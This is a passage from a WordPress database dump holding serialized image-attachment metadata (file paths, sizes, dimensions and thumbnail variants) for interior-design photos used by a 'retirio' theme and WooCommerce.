:5:\"width\";i:378;s:6:\"height\";i:824;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:67558;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:26:\"vintage-design-960x473.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:91949;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:26:\"vintage-design-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26711;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:26:\"vintage-design-600x900.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:900;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:117230;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:26:\"vintage-design-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4527;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(107,1155,'_wp_attached_file','2022/06/Simple-home.jpg'),(108,1155,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1000;s:6:\"height\";i:667;s:4:\"file\";s:23:\"2022/06/Simple-home.jpg\";s:8:\"filesize\";i:240395;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"Simple-home-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21912;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"Simple-home-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8928;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"Simple-home-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:118926;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:23:\"Simple-home-768x660.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:660;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:144632;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:23:\"Simple-home-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:58099;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:23:\"Simple-home-378x667.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:667;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:81941;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:23:\"Simple-home-960x473.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:144963;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:23:\"Simple-home-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31255;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:23:\"Simple-home-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:76589;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:23:\"Simple-home-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4661;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(110,1156,'_wp_attached_file','2022/06/luxyry-room.jpg'),(111,1156,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1000;s:6:\"height\";i:635;s:4:\"file\";s:23:\"2022/06/luxyry-room.jpg\";s:8:\"filesize\";i:157933;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"luxyry-room-300x191.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:191;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14759;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"luxyry-room-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6654;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"luxyry-room-768x488.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:488;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:78489;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:23:\"luxyry-room-768x635.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:635;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:119222;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:23:\"luxyry-room-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39783;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:23:\"luxyry-room-378x635.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:635;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:52708;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:23:\"luxyry-room-960x473.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:93745;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:23:\"luxyry-room-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21423;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:23:\"luxyry-room-600x381.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:381;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:50233;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:23:\"luxyry-room-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3639;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(113,1158,'_wp_attached_file','2022/06/Idea-interior.jpg'),(114,1158,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1000;s:6:\"height\";i:1048;s:4:\"file\";s:25:\"2022/06/Idea-interior.jpg\";s:8:\"filesize\";i:206242;s:5:\"sizes\";a:11:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"Idea-interior-286x300.jpg\";s:5:\"width\";i:286;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22261;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"Idea-interior-977x1024.jpg\";s:5:\"width\";i:977;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:189997;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"Idea-interior-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7603;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"Idea-interior-768x805.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:805;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:125988;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:25:\"Idea-interior-768x660.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:660;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:102759;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:25:\"Idea-interior-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:44054;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:25:\"Idea-interior-378x824.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:824;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:71549;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:25:\"Idea-interior-960x473.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:87365;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:25:\"Idea-interior-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23548;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:25:\"Idea-interior-600x629.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:629;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:81808;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:25:\"Idea-interior-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3965;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(116,1159,'_wp_attached_file','2022/06/buildings.jpg'),(117,1159,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:21:\"2022/06/buildings.jpg\";s:8:\"filesize\";i:158648;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"buildings-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16348;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"buildings-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5273;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:21:\"buildings-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:90639;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:21:\"buildings-768x660.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:660;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:77602;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:21:\"buildings-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31271;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:21:\"buildings-378x824.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:824;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:51579;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:21:\"buildings-960x473.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:65166;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:21:\"buildings-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16348;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:21:\"buildings-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:58088;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:21:\"buildings-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2992;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(119,1160,'_wp_attached_file','2022/06/Domestic.jpg'),(120,1160,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1000;s:6:\"height\";i:667;s:4:\"file\";s:20:\"2022/06/Domestic.jpg\";s:8:\"filesize\";i:104771;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"Domestic-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13822;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"Domestic-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6312;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"Domestic-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:65510;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:20:\"Domestic-768x660.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:660;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:83133;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:20:\"Domestic-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:35659;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:20:\"Domestic-378x667.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:667;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:48684;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:20:\"Domestic-960x473.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:75370;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:20:\"Domestic-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19596;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:20:\"Domestic-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:43227;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:20:\"Domestic-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3426;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(122,1161,'_wp_attached_file','2022/06/Philip-Johnson.jpg'),(123,1161,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1000;s:6:\"height\";i:1778;s:4:\"file\";s:26:\"2022/06/Philip-Johnson.jpg\";s:8:\"filesize\";i:194819;s:5:\"sizes\";a:12:{s:6:\"medium\";a:5:{s:4:\"file\";s:26:\"Philip-Johnson-169x300.jpg\";s:5:\"width\";i:169;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11900;}s:5:\"large\";a:5:{s:4:\"file\";s:27:\"Philip-Johnson-576x1024.jpg\";s:5:\"width\";i:576;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:115977;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:26:\"Philip-Johnson-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5886;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:27:\"Philip-Johnson-768x1366.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1366;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:200273;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:27:\"Philip-Johnson-864x1536.jpg\";s:5:\"width\";i:864;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:245638;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:26:\"Philip-Johnson-768x660.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:660;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:87591;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:26:\"Philip-Johnson-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:36929;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:26:\"Philip-Johnson-378x824.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:824;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:63736;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:26:\"Philip-Johnson-960x473.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:70647;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:26:\"Philip-Johnson-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19102;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:27:\"Philip-Johnson-600x1067.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:1067;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:126759;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:26:\"Philip-Johnson-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3232;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(125,1163,'_wp_attached_file','2022/06/Richard-Rogers.jpg'),(126,1163,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1000;s:6:\"height\";i:567;s:4:\"file\";s:26:\"2022/06/Richard-Rogers.jpg\";s:8:\"filesize\";i:171604;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:26:\"Richard-Rogers-300x170.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:170;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18736;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:26:\"Richard-Rogers-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9173;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:26:\"Richard-Rogers-768x435.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:435;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:102154;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:26:\"Richard-Rogers-768x567.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:567;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:142876;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:26:\"Richard-Rogers-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:59660;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:26:\"Richard-Rogers-378x567.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:567;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:73344;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:26:\"Richard-Rogers-960x473.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:130968;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:26:\"Richard-Rogers-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:32323;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:26:\"Richard-Rogers-600x340.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:340;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:65832;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:26:\"Richard-Rogers-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4637;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(127,1165,'_wp_attached_file','2022/06/cozy-living-room.jpg'),(128,1165,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1000;s:6:\"height\";i:563;s:4:\"file\";s:28:\"2022/06/cozy-living-room.jpg\";s:8:\"filesize\";i:136729;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:28:\"cozy-living-room-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13456;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:28:\"cozy-living-room-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6527;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:28:\"cozy-living-room-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:76344;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:28:\"cozy-living-room-768x563.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:563;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:98331;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:28:\"cozy-living-room-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:37411;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:28:\"cozy-living-room-378x563.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:563;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:43020;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:28:\"cozy-living-room-960x473.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:103101;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:28:\"cozy-living-room-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21235;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:28:\"cozy-living-room-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:48729;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:28:\"cozy-living-room-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3490;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(130,1167,'_wp_attached_file','2022/06/greater-commercial.jpg'),(131,1167,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1000;s:6:\"height\";i:525;s:4:\"file\";s:30:\"2022/06/greater-commercial.jpg\";s:8:\"filesize\";i:186707;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:30:\"greater-commercial-300x158.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:158;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11548;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:30:\"greater-commercial-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5539;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:30:\"greater-commercial-768x403.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:403;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:88951;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:30:\"greater-commercial-768x525.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:525;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:136854;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:30:\"greater-commercial-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i: